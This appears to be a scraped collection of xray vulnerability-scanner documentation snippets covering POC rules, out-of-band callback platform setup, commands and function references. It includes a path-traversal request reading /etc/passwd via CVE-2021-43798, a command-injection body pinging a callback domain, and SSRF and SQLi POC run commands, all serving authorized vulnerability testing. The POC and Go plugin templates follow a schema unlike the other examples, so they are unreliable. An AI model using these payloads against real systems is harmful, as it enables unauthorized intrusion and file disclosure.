### Basic YAML POC Example Source: https://docs.xray.cool/plugins/QuickStart A simple YAML POC file demonstrating how to define a request and an expression to match a response. It targets a GET request to the root path and checks for a 200 status code and specific text in the title. ```yaml name: poc-yaml-example transport: http rules: r0: request: method: GET path: / expression: response.status == 200 && response.title.bcontains(b"Example Domain") expression: r0() detail: author: test links: - https://example.com ``` -------------------------------- ### Start Reverse Platform Command Source: https://docs.xray.cool/tools/xray/Configuration Command to start the Xray reverse platform as a standalone remote service, allowing it to be used by multiple clients. Requires `db_file_path` and `token` to be configured. ```Shell ./xray reverse ``` -------------------------------- ### Starting Xray Reverse Proxy Source: https://docs.xray.cool/tools/xray/advanced/ssrf Command to start the Xray reverse proxy service, which also initiates the DNS server. ```bash ./xray reverse ``` -------------------------------- ### Install and Use Screen for Xray Reverse Proxy Source: https://docs.xray.cool/tools/xray/advanced/reverse Commands to install the 'screen' utility on Debian/Ubuntu based systems and start the Xray reverse proxy process within a detached screen session. This ensures the reverse proxy continues running even after disconnecting from the SSH session. ```bash apt update apt install screen screen -R reverse ./xray reverse exit screen -ls screen -r {{id}} ``` -------------------------------- ### Starting Xray Reverse Server Source: https://docs.xray.cool/tools/xray/advanced/ssrf Command to launch the Xray reverse proxy server. This command initiates the reverse connection platform, allowing it to receive and log incoming requests. ```bash ./xray reverse ``` -------------------------------- ### Xray Reverse Proxy Configuration Example Source: https://docs.xray.cool/tools/xray/advanced/ssrf Example configuration for Xray's reverse proxy, setting up DNS A records for 'ns1' and 'ns2' and specifying the DNS server IP. ```yaml resolve: - type: A record: ns1 value: 140.143.224.171 ttl: 60 - type: A record: ns2 ttl: 60 value: 140.143.224.171 client: dns_server_ip: "140.143.224.171" ``` -------------------------------- ### Phantasm Plugin Include and Exclude POC Example Source: https://docs.xray.cool/tools/xray/Configuration An advanced example showing how to combine 'include_poc' and 'exclude_poc' in the Phantasm plugin to load specific POCs from a directory while excluding others. ```yaml plugins: ... phantasm: enabled: true exclude_poc: - /home/poc/poc-fake-good-poc include_poc: - /home/poc/*good-poc* ``` -------------------------------- ### Test DNS Callback with nslookup Source: https://docs.xray.cool/tools/xray/advanced/reverse Use the 'nslookup' command to test DNS reverse callbacks. This is recommended for newly deployed setups to verify DNS resolution and server communication. ```shell nslookup ``` -------------------------------- ### bload Usage Examples Source: https://docs.xray.cool/plugins/yaml/TypeFunc/example/bytes/bload Illustrates how to use the `bload` function with different input strings and parameters, showing the resulting byte sequences. Examples cover various bases, alignment, prefixes, and steps. ```go bload("\x00\x01\x02\x03\x04\x0a", 16, 2, "\\x", 1) // Output: [0, 1, 2, 3, 4, 10] string(23).bload(10, 2, "", 0) // Output: [23] '01234'.format(2, '0', "\\x", 1).bload(16, 2, "\\x", 1) // Output: [0, 1, 2, 3, 4] ``` -------------------------------- ### Xray Configuration Example Source: https://docs.xray.cool/tools/xray/advanced/ssrf Example configuration snippet for Xray, specifying the HTTP base URL for the reverse proxy server and other network settings. This file is typically named 'config.yaml'. ```yaml http_base_url: "http://140.143.224.171:4445" dns_server_ip: "" remote_server: false ``` -------------------------------- ### Test DNS Callback with ping Source: https://docs.xray.cool/tools/xray/advanced/reverse Use the 'ping' command to test DNS reverse callbacks for established setups. This verifies that DNS queries are being routed to the Xray server, confirming the POC trigger. ```shell ping ``` -------------------------------- ### POC Writing Template Source: https://docs.xray.cool/plugins/Usage A template for writing Proof of Concept (POC) plugins for the xray security tool. This template provides a structured starting point for developing new POCs, covering essential elements and best practices. ```YAML # POC Writing Template # This is a basic template for creating xray POC plugins. # Refer to the documentation for detailed syntax and available functions. name: "Example POC" author: "Your Name" severity: "high" description: "A sample POC demonstrating a vulnerability." requests: - method: "GET" path: "/" # Add headers, body, etc. as needed # Example: headers: # User-Agent: "xray-poc" # Example: body: # data: "test" # Example: expression: # "status_code == 200 && contains(body, 'vulnerable')" # Optional: Define payloads, match conditions, etc. # Example: # payloads: # cmd: ["ls", "whoami"] # # match: # expression: "contains(body, 'root')" # # extract: # ip: "regex(\"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\")" # Related: POC编写示例 (/plugins/practice/poc/Example) # Related: SQL注入 (/plugins/practice/poc/SQLInjection) ``` -------------------------------- ### Install Docker Compose Source: https://docs.xray.cool/plugins/practice/poc/Example Installs Docker Compose on an Ubuntu system, a prerequisite for setting up containerized environments for vulnerability testing. This command updates package lists and installs the docker-compose package. ```shell apt-get update && apt-get install docker-compose -y && docker help ``` -------------------------------- ### POC Writing Template Source: https://docs.xray.cool/plugins A template for writing Proof of Concept (POC) plugins for the xray security tool. This template provides a structured starting point for developing new POCs, covering essential elements and best practices. ```YAML # POC Writing Template # This is a basic template for creating xray POC plugins. # Refer to the documentation for detailed syntax and available functions. name: "Example POC" author: "Your Name" severity: "high" description: "A sample POC demonstrating a vulnerability." requests: - method: "GET" path: "/" # Add headers, body, etc. as needed # Example: headers: # User-Agent: "xray-poc" # Example: body: # data: "test" # Example: expression: # "status_code == 200 && contains(body, 'vulnerable')" # Optional: Define payloads, match conditions, etc. # Example: # payloads: # cmd: ["ls", "whoami"] # # match: # expression: "contains(body, 'root')" # # extract: # ip: "regex(\"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\")" # Related: POC编写示例 (/plugins/practice/poc/Example) # Related: SQL注入 (/plugins/practice/poc/SQLInjection) ``` -------------------------------- ### Basic Functionality Examples Source: https://docs.xray.cool/tools/xpoc/ChangeLog Examples demonstrating core functionalities such as pulling cloud POCs and scanning targets, listing available POCs, and performing batch scans using file input or piping. ```shell ./xpoc -t https://example.com -html result.html ./xpoc list -a ./xpoc < targets.txt cat targets.txt | ./xpoc ./xpoc -i targets.txt ``` -------------------------------- ### YAML Plugin Parameter Types and Functions Source: https://docs.xray.cool/plugins/Usage Provides comprehensive details on parameter types and functions available for writing YAML plugins. Users can find function signatures, usage examples, and explanations for various functionalities within the xray plugin system. ```APIDOC YAML Plugin Parameter Types and Functions: This section details all available types and functions for developing YAML plugins. It serves as a reference for resolving usage issues during plugin development. Functionality: - View function signatures and descriptions. - Understand parameter types and constraints. - See usage examples and related functions. - Access detailed explanations by clicking the search icon (🔎) next to a function. Example Usage: (Image showing bsubmatch function usage in light and dark mode) Related Sections: - YAML插件的构成 (/plugins/yaml/YAMLScriptV2) - YAML插件的参数 (/plugins/yaml/YAMLTypeFunc) - YAML插件修复手册 (/plugins/yaml/Fix) ``` -------------------------------- ### YAML Plugin Parameter Types and Functions Source: https://docs.xray.cool/plugins Provides comprehensive details on parameter types and functions available for writing YAML plugins. Users can find function signatures, usage examples, and explanations for various functionalities within the xray plugin system. ```APIDOC YAML Plugin Parameter Types and Functions: This section details all available types and functions for developing YAML plugins. It serves as a reference for resolving usage issues during plugin development. Functionality: - View function signatures and descriptions. - Understand parameter types and constraints. - See usage examples and related functions. - Access detailed explanations by clicking the search icon (🔎) next to a function. Example Usage: (Image showing bsubmatch function usage in light and dark mode) Related Sections: - YAML插件的构成 (/plugins/yaml/YAMLScriptV2) - YAML插件的参数 (/plugins/yaml/YAMLTypeFunc) - YAML插件修复手册 (/plugins/yaml/Fix) ``` -------------------------------- ### versionGreater Function Parameters and Examples Source: https://docs.xray.cool/plugins/yaml/TypeFunc/example/version/versionGreater Details the parameters for the `versionGreater` function and provides usage examples with expected outputs, illustrating its behavior with different version formats. ```APIDOC versionGreater Function Signature: func (s1 string) versionGreater(s2 string) bool Parameters: s1: The version string to be compared. s2: The version string to compare against. Examples: Input: "1.8.1".versionGreater("1.8.2") Output: false Input: "1.8.1.1-alpha".versionGreater("1.8.1-alpha") Output: true Usage Context: Matching a response and comparing its version: "(?P\d\.\d\.\d\.)".submatch(response.body_string)["version"].versionGreater("1.8.2") Output: false ``` -------------------------------- ### Running a YAML POC with xray Source: https://docs.xray.cool/plugins/QuickStart Command to execute a saved YAML POC file against a target URL using the xray command-line interface. This demonstrates how to specify the POC file and the target URL for scanning. ```shell ./xray ws --poc example.yml --url http://127.0.0.1:8080 ``` -------------------------------- ### Xray Reverse Server Startup Logs Source: https://docs.xray.cool/tools/xray/advanced/ssrf Log output indicating the successful startup of the Xray reverse server. It shows the loading of configuration, the assigned base URL, and the web UI address. The logs also mention the underlying Go language components. ```go [INFO] 2019-09-08 09:25:02 +0800 [default:config.go:160] loading config from config.yaml reverse server base url: http://140.143.224.171:4445, token: imtoken1 reverse server webUI: http://140.143.224.171:4445/cland/ [DBUG] 2019-09-08 09:25:03 +0800 [default:reverse.go:40] reverse http server started, base url: http://140.143.224.171:4445, token: imtoken1 [INFO] 2019-09-08 09:25:03 +0800 [reverse:http_server.go:118] starting reverse http server ``` -------------------------------- ### GO Plugin Development Template Source: https://docs.xray.cool/plugins/Usage A template for developing plugins using the Go programming language for the xray tool. This guide provides the foundational structure and best practices for Go-based plugin development. ```GO // GO Plugin Development Template // This is a basic template for creating xray plugins in Go. // Refer to the documentation for detailed API and usage. package main import ( "fmt" "github.com/chaitin/xray/plugins/go/core" ) // Plugin is the entry point for the xray plugin. type Plugin struct {} // NewPlugin creates a new instance of the plugin. func NewPlugin() *Plugin { return &Plugin{} } // Register registers the plugin with the xray core. func (p *Plugin) Register(ctx *core.Context) { ctx.RegisterHook("request", p.OnRequest) ctx.RegisterHook("response", p.OnResponse) } // OnRequest is called before a request is sent. func (p *Plugin) OnRequest(ctx *core.Context, req *core.Request) error { fmt.Println("Processing request:", req.URL) // Modify request or add logic here return nil } // OnResponse is called after a response is received. func (p *Plugin) OnResponse(ctx *core.Context, resp *core.Response) error { fmt.Println("Received response for:", resp.Request.URL) // Analyze response or add logic here return nil } // main function is required for the plugin to be executable. func main() { core.RunPlugin(NewPlugin()) } // Related: 编写模板 (/plugins/go/Index) ``` -------------------------------- ### Phantasm Plugin Exclude POC Example Source: https://docs.xray.cool/tools/xray/Configuration Example demonstrating how to exclude specific POCs from being loaded by the Phantasm plugin. This is useful for disabling POCs that produce frequent false positives. ```yaml plugins: ... phantasm: enabled: true exclude_poc: - poc-yaml-bad-poc - "*bad-poc*" ``` -------------------------------- ### GO Plugin Development Template Source: https://docs.xray.cool/plugins A template for developing plugins using the Go programming language for the xray tool. This guide provides the foundational structure and best practices for Go-based plugin development. ```GO // GO Plugin Development Template // This is a basic template for creating xray plugins in Go. // Refer to the documentation for detailed API and usage. package main import ( "fmt" "github.com/chaitin/xray/plugins/go/core" ) // Plugin is the entry point for the xray plugin. type Plugin struct {} // NewPlugin creates a new instance of the plugin. func NewPlugin() *Plugin { return &Plugin{} } // Register registers the plugin with the xray core. func (p *Plugin) Register(ctx *core.Context) { ctx.RegisterHook("request", p.OnRequest) ctx.RegisterHook("response", p.OnResponse) } // OnRequest is called before a request is sent. func (p *Plugin) OnRequest(ctx *core.Context, req *core.Request) error { fmt.Println("Processing request:", req.URL) // Modify request or add logic here return nil } // OnResponse is called after a response is received. func (p *Plugin) OnResponse(ctx *core.Context, resp *core.Response) error { fmt.Println("Received response for:", resp.Request.URL) // Analyze response or add logic here return nil } // main function is required for the plugin to be executable. func main() { core.RunPlugin(NewPlugin()) } // Related: 编写模板 (/plugins/go/Index) ``` -------------------------------- ### Xray Version Command Output Source: https://docs.xray.cool/tools/xray/Feedback Example output when running the 'xray version' command, showing the tool's version, build date, operating system, architecture, and Go compiler version. This information is crucial for reporting issues. ```bash [xray 0.5.1/8f007251] Build: [Fri Jul 12 14:10:46 CST 2019] [darwin/amd64] [RELEASE/COMMUNITY] Compiler Version: go version go1.12.1 darwin/amd64 ``` -------------------------------- ### Xray Reverse Proxy Config (Non-Independent Server) Source: https://docs.xray.cool/tools/xray/advanced/reverse Configuration for the Xray reverse proxy when running as a non-independent remote server. The text notes a potential bug with this mode for passive proxy scanning and recommends the independent server setup. Ensure to replace placeholder IPs and domains. ```yaml # 反连平台配置,更多解释见 https://docs.xray.cool/#/configration/reverse # 注意: 默认配置为禁用反连平台,这是无法扫描出依赖反连平台的漏洞,这些漏洞包括 fastjson,ssrf 以及 poc 中依赖反连的情况等 reverse: db_file_path: "test.db" # 反连平台数据库文件位置, 这是一个 KV 数据库 token: "" # 反连平台认证的 Token, 独立部署时不能为空 http: enabled: true listen_ip: 0.0.0.0 listen_port: "8777" ip_header: "" # 在哪个 http header 中取 ip,为空代表从 REMOTE_ADDR 中取 dns: enabled: true listen_ip: 0.0.0.0 domain: "xxxxx.com" # 此处填写刚才准备好的域名,如果没有准备启动dns,没有准备域名,请不要填写 is_domain_name_server: true # 是否修改了域名的 ns 为反连平台,如果是,那 nslookup 等就不需要指定 dns 了 resolve: - type: A # A, AAAA, TXT 三种 record: localhost value: 127.0.0.1 ttl: 60 client: remote_server: false # 是否是独立的远程 server,如果是要在下面配置好远程的服务端地址 http_base_url: "http://8.130.41.223:8777" # 默认将根据 ListenIP 和 ListenPort 生成,该地址是存在漏洞的目标反连回来的地址, 当反连平台前面有反代、绑定域名、端口映射时需要自行配置 dns_server_ip: "8.130.41.223" # 和 http_base_url 类似,实际用来访问 dns 服务器的地址 # 如果没有准备启动dns,没有准备域名,请不要填写 ``` -------------------------------- ### Reverse Platform General Configuration Source: https://docs.xray.cool/tools/xray/Configuration Configures the reverse platform, essential for detecting vulnerabilities like SSRF, Fastjson, S2-052, and XXE blind attacks. It includes settings for the database file, authentication token, and HTTP listener. ```YAML reverse: db_file_path: "" # 反连平台数据库文件位置, 这是一个 KV 数据库 token: "" # 反连平台认证的 Token, 独立部署时不能为空 http: enabled: true listen_ip: 0.0.0.0 listen_port: "" ip_header: "" # 在哪个 http header 中取 ip,为空代表从 REMOTE_ADDR 中取 client: remote_server: false # 是否是独立的远程 server,如果是要在下面配置好远程的服务端地址 http_base_url: "" # 默认将根据 ListenIP 和 ListenPort 生成,该地址是存在漏洞的目标反连回来的地址, 当反连平台前面有反代、绑定域名、端口映射时需要自行配置 dns_server_ip: "" # 和 http_base_url 类似,实际用来访问dns服务器的地址 ``` -------------------------------- ### Format Function Usage Examples Source: https://docs.xray.cool/plugins/yaml/TypeFunc/example/string/format Illustrates the practical application of the format function with various inputs, demonstrating how different parameter combinations affect the output string. ```APIDOC Examples: | Original String | Call Statement | Output Result | |-------------------|------------------------------------|---------------| | '01234' | '01234'.format(2, '0', '\\x', 1) | '\\x00\\x01\\x02\\x03\\x04' | | 'abcde' | 'abcde'.format(2, ' ', '-', 2) | '- a b- c d- e' | | 'hello' | 'hello'.format(1, '_', '>', 2) | '>he>ll>o' | | 'data' | 'data'.format(3, '.', '#', 2) | '#d.a#t.a' | ``` -------------------------------- ### Xray SSRF External Site Access Plugin Example Source: https://docs.xray.cool/plugins/practice/poc/SSRF This YAML snippet demonstrates detecting SSRF by accessing external websites. It sends a GET request to a specified path that includes an external domain and checks the response for specific content like the title and heading of the 'Example Domain' page. ```yaml r0: request: cache: true method: GET path: /xxx/http/example.com follow_redirects: true expression: response.status == 200 && response.body.bcontains(b"Example Domain") && response.body.bcontains(b"

Example Domain

") ``` -------------------------------- ### Xray YAML: Http Path Usage Source: https://docs.xray.cool/plugins/yaml/advanced/Rules Explains how to define HTTP request paths within Xray YAML plugins. It details two methods for path construction: dynamic joining for paths starting with '/' and direct URI appending for paths starting with '^', providing examples for flexible rule writing. ```yaml # target: http://example.com:8080/test/test rules: r0: request: cache: true method: GET # target: http://example.com:8080/test/a path: /a expression: "true" output: r0Url: request.url.path r1: request: cache: true method: GET # target: http://example.com:8080/test/test/b path: '^{{inputPath}}/b' expression: "true" r2: request: cache: true method: GET # target: http://example.com:8080/c path: ^/c expression: "true" r3: request: cache: true method: GET # target: http://example.com:8080/test/a/d path: '^{{r0Url}}/d' expression: "true" ``` -------------------------------- ### Run Xray with fastjson Plugin Source: https://docs.xray.cool/tools/xray/advanced/reverse Execute Xray using the 'fastjson' plugin to test for Fastjson deserialization vulnerabilities. This command targets a specified URL to detect and exploit the vulnerability. ```shell ./xray_darwin_arm64 ws --plug fastjson --url http://123.58.224.8:52772 ``` -------------------------------- ### Running Drupal CVE-2014-3704 POC Source: https://docs.xray.cool/plugins/QuickStart Command to execute the Drupal CVE-2014-3704 SQL injection POC against a target. This showcases how to deploy a specific vulnerability scanner using the xray CLI. ```shell ./xray ws --poc drupal-cve-2014-3704-sqli.yml --url http://127.0.0.1:8080 ``` -------------------------------- ### Xray Reverse Server Startup Logs Source: https://docs.xray.cool/tools/xray/advanced/ssrf Logs indicating the successful startup of Xray's reverse HTTP and DNS servers, including their base URLs and tokens. ```log [INFO] 2019-09-08 10:20:16 +0800 [default:config.go:160] loading config from config.yaml reverse server base url: http://140.143.224.171:4445, token: imtoken1 reverse server webUI: http://140.143.224.171:4445/cland/ [DBUG] 2019-09-08 10:20:16 +0800 [default:reverse.go:40] reverse http server started, base url: http://140.143.224.171:4445, token: imtoken1 [DBUG] 2019-09-08 10:20:16 +0800 [default:reverse.go:52] reverse dns started [INFO] 2019-09-08 10:20:16 +0800 [reverse:dns_server.go:167] starting reverse dns server [INFO] 2019-09-08 10:20:16 +0800 [reverse:http_server.go:118] starting reverse http server ``` -------------------------------- ### transportcheck Skip Comment Source: https://docs.xray.cool/plugins/yaml/Fix Provides an example of how to skip transportcheck linting for a transport configuration line using a nolint comment. This is applied when the transport configuration is intentionally non-standard or needs to be exempted from checks. ```yaml transport: http # nolint[:transportlint] ``` -------------------------------- ### Vulnerability Reproduction for CVE-2021-43798 Source: https://docs.xray.cool/plugins/practice/poc/Example Demonstrates how to exploit CVE-2021-43798 by sending a crafted request to the Grafana instance. The example shows sending a GET request to retrieve the content of '/etc/passwd', confirming the path traversal vulnerability. ```APIDOC GET /public/plugins/..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1 Host: : User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close ``` -------------------------------- ### Example Reverse Domain Request Source: https://docs.xray.cool/plugins/yaml/TypeFunc/exampleType/reverse This snippet shows an example HTTP POST request constructed by the POC configuration. It targets `/run` on `127.0.0.1` and includes a `Content-Length` and a `test` parameter with a dynamically inserted reverse domain. This request is used to trigger the reverse lookup on the target system. ```http POST /run HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 43 Accept-Encoding: gzip, deflate Connection: close test=ls|ping+i-eeec7b-sna3-2r77.example.com ``` -------------------------------- ### Format Function Prototype and Parameters Source: https://docs.xray.cool/plugins/yaml/TypeFunc/example/string/format Details the Go function prototype for string formatting and explains each parameter's role in controlling alignment, padding, and stepping. ```APIDOC func (data string) format(align int, align_data string, prefix string, step int) string Parameters: data: The original string to be formatted. align: The number of align_data characters to fill between every two characters within each step interval. The actual fill count is align - 1. align_data: The single character used for padding to achieve alignment. prefix: The prefix string to be added before each step. step: The step value, controlling how often formatting operations occur (inserting prefix and padding with align_data). ``` -------------------------------- ### MD5 Content Matching Rule Source: https://docs.xray.cool/plugins/practice/finger/Practice An example rule that matches content based on the MD5 hash of the response body. It specifies a GET request to a test path and checks if the body's MD5 matches a given string. ```YAML rules: md5_in_body: request: method: GET path: /this_is_test_path expression: |- md5(response.body) == "ce1a1c8754948c6cbfcfa48545e8174b" ```